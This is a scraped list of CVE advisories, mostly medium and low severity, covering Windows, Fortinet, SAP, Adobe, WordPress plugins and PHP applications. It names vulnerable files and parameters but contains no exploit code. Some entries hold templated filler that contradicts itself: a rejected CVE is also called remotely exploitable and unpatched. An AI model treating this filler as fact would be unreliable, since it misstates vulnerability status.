Windows Server 2025
-
CVE-2025-33060
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 10 21h2
Windows 10 22h2
-
CVE-2025-33059
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 10 1607
Windows 10 1507
-
CVE-2025-33058
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 10 21h2
Windows 11 24h2
-
CVE-2025-33057
MEDIUM
CVSS 6.5
Null pointer dereference in Windows Local Security Authority (LSA) allows an authorized attacker to deny service over a network.
Microsoft
Null Pointer Dereference
Denial Of Service
Windows 10 1809
Windows 11 24h2
-
CVE-2025-33055
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 11 22h2
Windows Server 2016
-
CVE-2025-33052
MEDIUM
CVSS 5.5
Use of uninitialized resource in Windows DWM Core Library allows an authorized attacker to disclose information locally.
Microsoft
Information Disclosure
Windows 10 22h2
Windows 11 23h2
Windows Server 2022
-
CVE-2025-32722
MEDIUM
CVSS 5.5
Improper access control in Windows Storage Port Driver allows an authorized attacker to disclose information locally.
Microsoft
Authentication Bypass
Windows 10 1507
Windows Server 2022
Windows 11 24h2
-
CVE-2025-32720
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows 10 1607
Windows 10 1507
-
CVE-2025-32719
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows Server 2022 23h2
Windows 10 1607
-
CVE-2025-32715
MEDIUM
CVSS 6.5
Out-of-bounds read in Remote Desktop Client allows an unauthorized attacker to disclose information over a network.
Buffer Overflow
Information Disclosure
Windows 10 1809
Windows Server 2022 23h2
Windows Server 2019
-
CVE-2025-31325
MEDIUM
CVSS 5.8
Due to a Cross-Site Scripting vulnerability in SAP NetWeaver (ABAP Keyword Documentation), an unauthenticated attacker could inject malicious JavaScript into a web page through an unprotected parameter. When a victim accesses the affected page, the script executes in their browser, providing the attacker limited access to restricted information. The vulnerability does not affect data integrity or availability and operates entirely within the context of the client's browser.
Sap
XSS
-
CVE-2025-30321
MEDIUM
CVSS 5.5
InDesign Desktop versions ID20.2, ID19.5.3 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application, causing disruption in service. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Null Pointer Dereference
Denial Of Service
Indesign
-
CVE-2025-27505
MEDIUM
CVSS 5.3
GeoServer is an open source server that allows users to share and edit geospatial data. It is possible to bypass the default REST API security and access the index page. The REST API security handles rest and its subpaths but not rest with an extension (e.g., rest.html). The REST API index can disclose whether certain extensions are installed. This vulnerability is fixed in 2.26.3 and 2.25.6. As a workaround, in ${GEOSERVER_DATA_DIR}/security/config.xml, change the paths for the rest filter to /rest.*,/rest/** and change the paths for the gwc filter to /gwc/rest.*,/gwc/rest/** and restart GeoServer.
Authentication Bypass
Geoserver
-
CVE-2025-27207
MEDIUM
CVSS 6.5
Adobe Commerce versions 2.4.8, 2.4.7-p5, 2.4.6-p10, 2.4.5-p12, 2.4.4-p13 and earlier are affected by an Improper Access Control vulnerability that could result in privilege escalation. A low privileged attacker could leverage this vulnerability to bypass security measures and gain unauthorized read access. Exploitation of this issue does not require user interaction.
Adobe
Privilege Escalation
Authentication Bypass
Commerce B2b
-
CVE-2025-27206
MEDIUM
CVSS 5.3
Adobe Commerce versions 2.4.8, 2.4.7-p5, 2.4.6-p10, 2.4.5-p12, 2.4.4-p13 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain limited write access. Exploitation of this issue does not require user interaction.
Adobe
Authentication Bypass
Commerce B2b
Commerce
Magento
-
CVE-2025-26394
MEDIUM
CVSS 4.8
SolarWinds Observability Self-Hosted
is susceptible to an open redirection vulnerability. The URL is not properly sanitized, and an attacker could manipulate the string to redirect a user to a malicious site. The attack complexity is high, and authentication is required.
Open Redirect
Observability Self Hosted
-
CVE-2025-25250
MEDIUM
CVSS 4.3
An Exposure of Sensitive Information to an Unauthorized Actor vulnerability [CWE-200] in FortiOS version 7.6.0, version 7.4.7 and below, 7.2 all versions, 7.0 all versions, 6.4 all versions SSL-VPN web-mode may allow an authenticated user to access full SSL-VPN settings via crafted URL.
Information Disclosure
Fortinet
Fortisase
Fortios
-
CVE-2025-24471
MEDIUM
CVSS 6.5
An Improper Certificate Validation vulnerability [CWE-295] in FortiOS version 7.6.1 and below, version 7.4.7 and below may allow an EAP verified remote user to connect from FortiClient via revoked certificate.
Fortinet
Information Disclosure
Fortios
Fortisase
-
CVE-2025-24069
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows Server 2016
Windows 10 22h2
-
CVE-2025-24068
MEDIUM
CVSS 5.5
Buffer over-read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Windows Server 2016
Windows 11 22h2
Windows 10 22h2
-
CVE-2025-24065
MEDIUM
CVSS 5.5
Out-of-bounds read in Windows Storage Management Provider allows an authorized attacker to disclose information locally.
Microsoft
Buffer Overflow
Information Disclosure
Windows Server 2022
Windows 11 24h2
-
CVE-2025-22829
MEDIUM
CVSS 4.3
The CloudStack Quota plugin has an improper privilege management logic in version 4.20.0.0. Anyone with authenticated user-account access in CloudStack 4.20.0.0 environments, where this plugin is enabled and have access to specific APIs can enable or disable reception of quota-related emails for any account in the environment and list their configurations.
Quota plugin users using CloudStack 4.20.0.0 are recommended to upgrade to CloudStack version 4.20.1.0, which fixes this issue.
Privilege Escalation
Cloudstack
-
CVE-2025-22256
MEDIUM
CVSS 6.3
A security vulnerability in Fortinet FortiPAM 1.4.0 (CVSS 6.3) that allows attacker. Remediation should follow standard vulnerability management procedures.
Fortinet
Information Disclosure
Fortipam
Fortisra
-
CVE-2025-22254
MEDIUM
CVSS 6.6
An Improper Privilege Management vulnerability [CWE-269] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.1, FortiOS 7.4.0 through 7.4.6, FortiOS 7.2.0 through 7.2.10, FortiOS 7.0.0 through 7.0.16, FortiOS 6.4.0 through 6.4.15, FortiProxy 7.6.0 through 7.6.1, FortiProxy 7.4.0 through 7.4.7, FortiWeb 7.6.0 through 7.6.1, FortiWeb 7.4.0 through 7.4.6 allows an authenticated attacker with at least read-only admin permissions to gain super-admin privileges via crafted requests to Node.js websocket module.
Node.js
Privilege Escalation
Fortinet
Fortiweb
Fortios
-
CVE-2025-5975
MEDIUM
CVSS 4.3
A vulnerability, which was classified as problematic, was found in PHPGurukul Rail Pass Management System 1.0. This affects an unknown part of the file /rpms/download-pass.php. The manipulation of the argument searchdata leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
Rail Pass Management System
-
CVE-2025-5971
MEDIUM
CVSS 6.3
A vulnerability was found in code-projects School Fees Payment System 1.0. It has been classified as critical. This affects an unknown part of the file /ajx.php. The manipulation of the argument name_startsWith leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
PHP
SQLi
School Fees Payment System
-
CVE-2025-5935
MEDIUM
CVSS 5.3
A vulnerability was found in Open5GS up to 2.7.3. It has been declared as problematic. Affected by this vulnerability is the function common_register_state of the file src/mme/emm-sm.c of the component AMF/MME. The manipulation of the argument ran_ue_id leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 62cb99755243c9c38e4c060c5d8d0e158fe8cdd5. It is recommended to apply a patch to fix this issue.
Denial Of Service
Debian
Open5gs
-
CVE-2025-5925
MEDIUM
CVSS 4.3
The Bunny’s Print CSS plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.95. This is due to missing or incorrect nonce validation on the pcss_options_subpanel() function. This makes it possible for unauthenticated attackers to update settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
WordPress
CSRF
PHP
-
CVE-2025-5743
MEDIUM
CVSS 5.5
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulnerability exists that could cause remote control over the charging station when an authenticated user
modifies configuration parameters on the web server.
Command Injection
-
CVE-2025-5742
MEDIUM
CVSS 5.4
CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
vulnerability exists when an authenticated user modifies configuration parameters on the web server
XSS
-
CVE-2025-5741
MEDIUM
CVSS 4.9
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists that
could cause arbitrary file reads from the charging station. The exploitation of this vulnerability does require an
authenticated session of the web server.
Path Traversal
-
CVE-2025-4774
MEDIUM
CVSS 6.4
The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-countdown attribute of Countdown widget in all versions up to, and including, 4.11.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
WordPress
XSS
Premium Addons For Elementor
PHP
-
CVE-2025-4577
MEDIUM
CVSS 6.4
The Smash Balloon Social Post Feed - Simple Social Feeds for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the data-color attribute in all versions up to, and including, 4.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
WordPress
XSS
Smash Balloon Social Post Feed
PHP
-
CVE-2025-3905
MEDIUM
CVSS 5.4
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability
exists impacting PLC system variables that could cause an unvalidated data injected by authenticated
malicious user leading to modify or read data in a victim’s browser.
XSS
-
CVE-2025-3899
MEDIUM
CVSS 5.4
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability
exists in Certificates page on Webserver that could cause an unvalidated data injected by authenticated
malicious user leading to modify or read data in a victim’s browser.
XSS
-
CVE-2025-3898
MEDIUM
CVSS 6.5
CWE-20: Improper Input Validation vulnerability exists that could cause Denial of Service when an
authenticated malicious user sends HTTPS request containing invalid data type to the webserver.
Denial Of Service
-
CVE-2025-3117
MEDIUM
CVSS 5.4
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability
exists impacting configuration file paths that could cause an unvalidated data injected by authenticated
malicious user leading to modify or read data in a victim’s browser.
XSS
-
CVE-2025-3116
MEDIUM
CVSS 6.5
CWE-20: Improper Input Validation vulnerability exists that could cause Denial of Service when an
authenticated malicious user sends special malformed HTTPS request containing improper formatted body
data to the controller.
Denial Of Service
-
CVE-2025-3112
MEDIUM
CVSS 6.5
CWE-400: Uncontrolled Resource Consumption vulnerability exists that could cause Denial of Service when an
authenticated malicious user sends manipulated HTTPS Content-Length header to the webserver.
Denial Of Service
-
CVE-2025-3076
MEDIUM
CVSS 6.4
The Elementor Website Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘button_text’ parameter in all versions up to, and including, 3.29.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
WordPress
XSS
Elementor Page Builder
PHP
-
CVE-2025-2918
MEDIUM
CVSS 6.4
The Ultimate Blocks - WordPress Blocks Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
WordPress
XSS
Ultimate Blocks
PHP
-
CVE-2025-2884
MEDIUM
CVSS 6.6
TCG TPM2.0 Reference implementation's CryptHmacSign helper function is vulnerable to Out-of-Bounds read due to the lack of validation the signature scheme with the signature key's algorithm. See Errata Revision 1.83 and advisory TCGVRT0009 for TCG standard TPM2.0
Buffer Overflow
Information Disclosure
-
CVE-2025-0037
MEDIUM
CVSS 6.6
CVE-2025-0037 is a security vulnerability (CVSS 6.6) that allows access. Remediation should follow standard vulnerability management procedures.
Information Disclosure
-
CVE-2024-57189
MEDIUM
CVSS 5.4
In Erxes <1.6.2, an authenticated attacker can write to arbitrary files on the system using a Path Traversal vulnerability in the importHistoriesCreate GraphQL mutation handler.
Path Traversal
Erxes
-
CVE-2024-57186
MEDIUM
CVSS 5.4
In Erxes <1.6.2, an unauthenticated attacker can read arbitrary files from the system using a Path Traversal vulnerability in the /read-file endpoint handler.
Path Traversal
Erxes
-
CVE-2024-54019
MEDIUM
CVSS 4.8
A security vulnerability in Fortinet FortiClientWindows (CVSS 4.8) that allows an unauthorized attacker. Remediation should follow standard vulnerability management procedures.
Fortinet
Authentication Bypass
Forticlient
Windows
-
CVE-2024-50568
MEDIUM
CVSS 5.9
A security vulnerability in Fortinet FortiOS (CVSS 5.9) that allows an unauthenticated attacker with the knowledge of device specific data. Remediation should follow standard vulnerability management procedures.
Fortinet
Information Disclosure
Fortiproxy
Fortios
-
CVE-2024-50562
MEDIUM
CVSS 4.8
An Insufficient Session Expiration vulnerability [CWE-613] in FortiOS SSL-VPN version 7.6.0, version 7.4.6 and below, version 7.2.10 and below, 7.0 all versions, 6.4 all versions may allow an attacker in possession of a cookie used to log in the SSL-VPN portal to log in again, although the session has expired or was logged out.
Fortinet
Information Disclosure
Fortios
Fortisase
-
CVE-2024-45329
MEDIUM
CVSS 4.3
A authorization bypass through user-controlled key in Fortinet FortiPortal versions 7.4.0, versions 7.2.0 through 7.2.5, and versions 7.0.0 through 7.0.8 may allow an authenticated attacker to view unauthorized device information via key modification in API requests.
Fortinet
Authentication Bypass
Fortiportal
-
CVE-2024-41797
MEDIUM
CVSS 4.3
A vulnerability has been identified in RUGGEDCOM RST2428P (6GK6242-6PA00) (All versions < V3.1), SCALANCE XC316-8 (6GK5324-8TS00-2AC2) (All versions < V3.1), SCALANCE XC324-4 (6GK5328-4TS00-2AC2) (All versions < V3.1), SCALANCE XC324-4 EEC (6GK5328-4TS00-2EC2) (All versions < V3.1), SCALANCE XC332 (6GK5332-0GA00-2AC2) (All versions < V3.1), SCALANCE XC416-8 (6GK5424-8TR00-2AC2) (All versions < V3.1), SCALANCE XC424-4 (6GK5428-4TR00-2AC2) (All versions < V3.1), SCALANCE XC432 (6GK5432-0GR00-2AC2) (All versions < V3.1), SCALANCE XCH328 (6GK5328-4TS01-2EC2) (All versions < V3.1), SCALANCE XCM324 (6GK5324-8TS01-2AC2) (All versions < V3.1), SCALANCE XCM328 (6GK5328-4TS01-2AC2) (All versions < V3.1), SCALANCE XCM332 (6GK5332-0GA01-2AC2) (All versions < V3.1), SCALANCE XR302-32 (6GK5334-5TS00-2AR3) (All versions < V3.1), SCALANCE XR302-32 (6GK5334-5TS00-3AR3) (All versions < V3.1), SCALANCE XR302-32 (6GK5334-5TS00-4AR3) (All versions < V3.1), SCALANCE XR322-12 (6GK5334-3TS00-2AR3) (All versions < V3.1), SCALANCE XR322-12 (6GK5334-3TS00-3AR3) (All versions < V3.1), SCALANCE XR322-12 (6GK5334-3TS00-4AR3) (All versions < V3.1), SCALANCE XR326-8 (6GK5334-2TS00-2AR3) (All versions < V3.1), SCALANCE XR326-8 (6GK5334-2TS00-3AR3) (All versions < V3.1), SCALANCE XR326-8 (6GK5334-2TS00-4AR3) (All versions < V3.1), SCALANCE XR326-8 EEC (6GK5334-2TS00-2ER3) (All versions < V3.1), SCALANCE XR502-32 (6GK5534-5TR00-2AR3) (All versions < V3.1), SCALANCE XR502-32 (6GK5534-5TR00-3AR3) (All versions < V3.1), SCALANCE XR502-32 (6GK5534-5TR00-4AR3) (All versions < V3.1), SCALANCE XR522-12 (6GK5534-3TR00-2AR3) (All versions < V3.1), SCALANCE XR522-12 (6GK5534-3TR00-3AR3) (All versions < V3.1), SCALANCE XR522-12 (6GK5534-3TR00-4AR3) (All versions < V3.1), SCALANCE XR526-8 (6GK5534-2TR00-2AR3) (All versions < V3.1), SCALANCE XR526-8 (6GK5534-2TR00-3AR3) (All versions < V3.1), SCALANCE XR526-8 (6GK5534-2TR00-4AR3) (All versions < V3.1), SCALANCE XRH334 (24 V DC, 8xFO, CC) (6GK5334-2TS01-2ER3) (All versions < V3.1), SCALANCE XRM334 (230 V AC, 12xFO) (6GK5334-3TS01-3AR3) (All versions < V3.1), SCALANCE XRM334 (230 V AC, 8xFO) (6GK5334-2TS01-3AR3) (All versions < V3.1), SCALANCE XRM334 (230V AC, 2x10G, 24xSFP, 8xSFP+) (6GK5334-5TS01-3AR3) (All versions < V3.1), SCALANCE XRM334 (24 V DC, 12xFO) (6GK5334-3TS01-2AR3) (All versions < V3.1), SCALANCE XRM334 (24 V DC, 8xFO) (6GK5334-2TS01-2AR3) (All versions < V3.1), SCALANCE XRM334 (24V DC, 2x10G, 24xSFP, 8xSFP+) (6GK5334-5TS01-2AR3) (All versions < V3.1), SCALANCE XRM334 (2x230 V AC, 12xFO) (6GK5334-3TS01-4AR3) (All versions < V3.1), SCALANCE XRM334 (2x230 V AC, 8xFO) (6GK5334-2TS01-4AR3) (All versions < V3.1), SCALANCE XRM334 (2x230V AC, 2x10G, 24xSFP, 8xSFP+) (6GK5334-5TS01-4AR3) (All versions < V3.1). Affected devices contain an incorrect authorization check vulnerability. This could allow an authenticated remote attacker with "guest" role to invoke an internal "do system" command which exceeds their privileges. This command allows the execution of certain low-risk actions, the most critical of which is clearing the local system log.
Siemens
Privilege Escalation
-
CVE-2024-41505
MEDIUM
CVSS 6.1
Jetimob Plataforma Imobiliaria 20240627-0 is vulnerable to Cross Site Scripting (XSS) in the "Pessoas" (persons) section via the field "Profisso" (professor).
XSS
Imobiliaria
-
CVE-2024-41504
MEDIUM
CVSS 6.1
Jetimob Plataforma Imobiliaria 20240627-0 is vulnerable to Cross Site Scripting (XSS). In the "Oportunidades" (opportunities) section of the application when creating or editing an "Atividade" (activity), the form field "Descrico" allows injection of JavaScript.
XSS
Imobiliaria
-
CVE-2024-41503
MEDIUM
CVSS 6.1
Jetimob Plataforma Imobiliaria 20240627-0 is vulnerable to Cross Site Scripting (XSS) in the field "Ttulo" (title) inside the filter Save option in the "Busca" (search) function.
XSS
Imobiliaria
-
CVE-2024-41502
MEDIUM
CVSS 6.1
Jetimob Plataforma Imobiliaria 20240627-0 is vulnerable to Cross Site Scripting (XSS) via the form field "Observaces" (observances) in the "Pessoas" (persons) section when creating or editing either a legal or a natural person.
XSS
Imobiliaria
-
CVE-2024-40625
MEDIUM
CVSS 5.5
GeoServer is an open source server that allows users to share and edit geospatial data. The Coverage rest api /workspaces/{workspaceName}/coveragestores/{storeName}/{method}.{format} allows attackers to upload files with a specified url (with {method} equals 'url') with no restrict. This vulnerability is fixed in 2.26.0.
SSRF
Geoserver
-
CVE-2024-38524
MEDIUM
CVSS 5.3
GeoServer is an open source server that allows users to share and edit geospatial data. org.geowebcache.GeoWebCacheDispatcher.handleFrontPage(HttpServletRequest, HttpServletResponse) has no check to hide potentially sensitive information from users except for a hidden system property to hide the storage locations that defaults to showing the locations. This vulnerability is fixed in 2.26.2 and 2.25.6.
Information Disclosure
Geoserver
-
CVE-2024-37396
MEDIUM
CVSS 5.4
A stored cross-site scripting (XSS) vulnerability in the Calendar function of REDCap 13.1.9 allows authenticated users to execute arbitrary web script or HTML by injecting a crafted payload into the 'Notes' field of a calendar event. This could lead to the execution of malicious scripts when the event is viewed. Updating to version 14.2.1 or later is recommended to remediate this vulnerability.
XSS
Redcap
-
CVE-2024-37395
MEDIUM
CVSS 5.4
A stored cross-site scripting (XSS) vulnerability in the Public Survey function of REDCap 13.1.9 allows authenticated users to execute arbitrary web script or HTML by injecting a crafted payload into the 'Survey Title' and 'Survey Instructions' fields. This vulnerability could be exploited by attackers to execute malicious scripts when the survey is accessed through its public link. It is advised to update to version 14.2.1 or later to fix this issue.
XSS
Redcap
-
CVE-2024-37394
MEDIUM
CVSS 5.4
A stored cross-site scripting (XSS) vulnerability in the Project Dashboards of REDCap 13.1.9 allows authenticated users to execute arbitrary web script or HTML by injecting a crafted payload into the 'Dashboard title' and 'Dashboard content' text boxes. This can lead to the execution of malicious scripts when the dashboard is viewed. Users are recommended to update to version 14.2.1 or later to mitigate this vulnerability.
XSS
Redcap
-
CVE-2024-32119
MEDIUM
CVSS 4.8
A security vulnerability in Fortinet FortiClientEMS (CVSS 4.8). Remediation should follow standard vulnerability management procedures.
Fortinet
Authentication Bypass
Forticlientems
-
CVE-2023-48786
MEDIUM
CVSS 4.3
A server-side request forgery vulnerability [CWE-918] in Fortinet FortiClientEMS version 7.4.0 through 7.4.2 and before 7.2.6 may allow an authenticated attacker to perform internal requests via crafted HTTP or HTTPS requests.
Fortinet
SSRF
Forticlientems
-
CVE-2025-47096
LOW
CVSS 3.5
Adobe Experience Manager versions 6.5.22 and earlier are affected by an Improper Input Validation vulnerability that could result in a security feature bypass, allowing a low impact to the integrity of the component. Exploitation of this issue requires user interaction in that a victim must interact with the malicious content. Low privileges are required.
Adobe
Authentication Bypass
-
CVE-2025-47095
LOW
CVSS 3.1
Rejected reason: This CVE ID was issued in error by its CVE Numbering Authority and does not represent a valid vulnerability. Rated low severity (CVSS 3.1), this vulnerability is remotely exploitable, no authentication required. No vendor patch available.
Information Disclosure
-
CVE-2025-42990
LOW
CVSS 3.0
Unprotected SAPUI5 applications allow an attacker with basic privileges to inject malicious HTML code into a webpage, with the goal of redirecting users to the attacker controlled URL. This issue could impact the integrity of the application. Confidentiality or Availability are not impacted.
XSS
-
CVE-2025-42988
LOW
CVSS 3.7
Under certain conditions, SAP Business Objects Business Intelligence Platform allows an unauthenticated attacker to enumerate HTTP endpoints in the internal network by specially crafting HTTP requests. This disclosure of information could further enable the researcher to cause SSRF. It has no impact on integrity and availability of the application.
Sap
SSRF
-
CVE-2025-36576
LOW
CVSS 2.7
Dell Wyse Management Suite, versions prior to WMS 5.2, contain a Cross-Site Request Forgery (CSRF) vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Server-side request forgery.
CSRF
SSRF
Dell
-
CVE-2025-22251
LOW
CVSS 3.1
CVE-2025-22251 is a security vulnerability (CVSS 3.1) that allows an unauthenticated attacker. Remediation should follow standard vulnerability management procedures.
Fortinet
Authentication Bypass
-
CVE-2025-5984
LOW
CVSS 3.5
A vulnerability has been found in SourceCodester Online Student Clearance System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /Admin/add-fee.php. The manipulation of the argument txtamt leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
-
CVE-2025-5976
LOW
CVSS 3.5
A vulnerability has been found in PHPGurukul Rail Pass Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/add-pass.php. The manipulation of the argument fullname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.
PHP
XSS
-
CVE-2025-5974
LOW
CVSS 3.5
A vulnerability, which was classified as problematic, has been found in PHPGurukul Restaurant Table Booking System 1.0. Affected by this issue is some unknown functionality of the file /check-status.php. The manipulation of the argument searchdata leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
-
CVE-2025-5973
LOW
CVSS 2.4
A vulnerability classified as problematic was found in PHPGurukul Restaurant Table Booking System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/add-table.php. The manipulation of the argument tableno leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
PHP
XSS
-
CVE-2025-5972
LOW
CVSS 2.4
A vulnerability classified as problematic has been found in PHPGurukul Restaurant Table Booking System 1.0. Affected is an unknown function of the file /admin/manage-subadmins.php. The manipulation of the argument fullname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.
PHP
XSS
-
CVE-2025-5970
LOW
CVSS 2.4
A vulnerability was found in PHPGurukul Restaurant Table Booking System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/add-subadmin.php. The manipulation of the argument fullname leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.
PHP
XSS
-
CVE-2025-5945
None
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority. No vendor patch available.
Information Disclosure
-
CVE-2025-4801
None
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. No vendor patch available.
Information Disclosure
-
CVE-2025-0036
LOW
CVSS 3.2
CVE-2025-0036 is a security vulnerability (CVSS 3.2). Remediation should follow standard vulnerability management procedures.
Information Disclosure
-
CVE-2024-55595
None
Rejected reason: Not used. No vendor patch available.
Information Disclosure
-
CVE-2023-29184
LOW
CVSS 3.2
An incomplete cleanup vulnerability [CWE-459] in FortiOS 7.2 all versions and before & FortiProxy version 7.2.0 through 7.2.2 and before 7.0.8 allows a VDOM privileged attacker to add SSH key files on the system silently via crafted CLI requests.
Fortinet
Information Disclosure